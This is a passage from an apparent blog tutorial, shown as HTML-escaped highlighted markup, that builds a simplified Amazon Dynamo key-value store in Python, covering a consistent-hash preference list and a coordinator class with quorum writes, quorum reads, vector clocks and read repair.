&lt;/span&gt;        &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;)):&lt;/span&gt;
            &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;start_idx&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;%&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Part 5: The Dynamo Coordinator
&lt;/h3&gt;

&lt;p&gt;This is the heart of the system — the logic that handles client requests, fans out to replicas, waits for quorum, and detects conflicts. Study this carefully; it's where all the earlier concepts converge.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SimplifiedDynamo&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    Coordinates reads and writes across a cluster of DynamoNodes.

    Any node can act as coordinator for any request — there&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s no
    dedicated master. The coordinator is simply whichever node
    receives the client request (or the first node in the preference
    list, if using partition-aware routing).

    Configuration:
      N = total replicas per key
      R = minimum nodes that must respond to a read (read quorum)
      W = minimum nodes that must acknowledge a write (write quorum)
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;int&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;N&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;R&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;ConsistentHashRing&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;    &lt;span class="c1"&gt;#  WRITE                                                               #
&lt;/span&gt;    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;put&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;object&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Write a key-value pair to N replicas, wait for W ACKs.

        The &lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;context&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt; is the vector clock from a previous read.
        Always pass context when updating an existing key — it tells
        Dynamo which version you&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;re building on top of, so it can
        detect whether your write is concurrent with anything else.

        Returns the new vector clock, which the caller should store
        and pass back on future writes to this key.

        Raises: RuntimeError if fewer than W nodes acknowledged.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;No nodes available&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# The coordinator is always the first node in the preference list.
&lt;/span&gt;        &lt;span class="n"&gt;coordinator&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

        &lt;span class="c1"&gt;# Increment the coordinator's counter in the vector clock.
&lt;/span&gt;        &lt;span class="c1"&gt;# If no context was provided (brand new key), start a fresh clock.
&lt;/span&gt;        &lt;span class="n"&gt;base_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="nc"&gt;VectorClock&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="n"&gt;new_clock&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base_clock&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;increment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;coordinator&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;node_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="n"&gt;versioned&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Fan out to all N replicas.
&lt;/span&gt;        &lt;span class="c1"&gt;# In a real system these would be concurrent RPC calls.
&lt;/span&gt;        &lt;span class="c1"&gt;# Here we call them sequentially for simplicity.
&lt;/span&gt;        &lt;span class="n"&gt;ack_count&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versioned&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="n"&gt;ack_count&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

        &lt;span class="c1"&gt;# Only need W ACKs to declare success.
&lt;/span&gt;        &lt;span class="c1"&gt;# The remaining replicas are updated asynchronously (or via
&lt;/span&gt;        &lt;span class="c1"&gt;# hinted handoff if they were down).
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;ack_count&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
                &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Write quorum not met: got &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;ack_count&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; ACKs, needed &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
            &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;[PUT] key=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;  value=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;  clock=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;new_clock&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;  &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
              &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;ack_count&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;/&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; nodes wrote)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;new_clock&lt;/span&gt;

    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;    &lt;span class="c1"&gt;#  READ                                                                #
&lt;/span&gt;    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
        Read a key from N replicas, wait for R responses, reconcile.

        Returns a LIST of VersionedValues:
          - Length 1  → clean read, no conflict
          - Length &amp;gt;1 → concurrent versions detected; application must merge

        After reading, the caller should:
          1. If no conflict: use the single value normally.
          2. If conflict: merge the values using application logic,
             then call put() with the merged value and the merged
             vector clock as context. This &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;closes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt; the conflict.

        Read repair happens in the background: any replica that returned
        a stale version is silently updated with the latest version.
        &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;preference_list&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ring&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get_preference_list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Collect responses from all N nodes
&lt;/span&gt;        &lt;span class="n"&gt;all_versions&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;
        &lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;tuple&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;DynamoNode&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;list&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;VersionedValue&lt;/span&gt;&lt;span class="p"&gt;]]]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;

        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;preference_list&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;   &lt;span class="c1"&gt;# None means the node is down
&lt;/span&gt;                &lt;span class="n"&gt;all_versions&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;extend&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
                &lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;append&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;RuntimeError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
                &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Read quorum not met: got &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; responses, needed &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;R&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
            &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Reconcile: discard any version that is strictly dominated
&lt;/span&gt;        &lt;span class="c1"&gt;# (i.e., is a causal ancestor of) another version.
&lt;/span&gt;        &lt;span class="c1"&gt;# What remains is the set of concurrent versions.
&lt;/span&gt;        &lt;span class="n"&gt;reconciled&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;_reconcile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;all_versions&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# Background read repair: if any node returned something older
&lt;/span&gt;        &lt;span class="c1"&gt;# than the reconciled result, send it the latest version.
&lt;/span&gt;        &lt;span class="c1"&gt;# (Simplified: only meaningful when there's a single winner.)
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="n"&gt;latest&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="n"&gt;versions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;latest&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;vector_clock&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
                    &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;latest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;   &lt;span class="c1"&gt;# Repair silently in background
&lt;/span&gt;
        &lt;span class="n"&gt;status&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;clean&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;CONFLICT (&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;reconciled&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; versions)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;[GET] key=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="si"&gt;!r}&lt;/span&gt;&lt;span class="s"&gt;  status=&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;status&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;  &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
              &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;(&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;responding_nodes&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;/&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;N&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; nodes responded)&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;reconciled&lt;/span&gt;

    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;    &lt;span class="c1"&gt;#  INTERNAL: VERSION RECONCILIATION                                   #
&lt;/span&gt;    &lt;span class="c1"&gt;# ------------------------------------------------------------------ #
&lt;/span&gt;
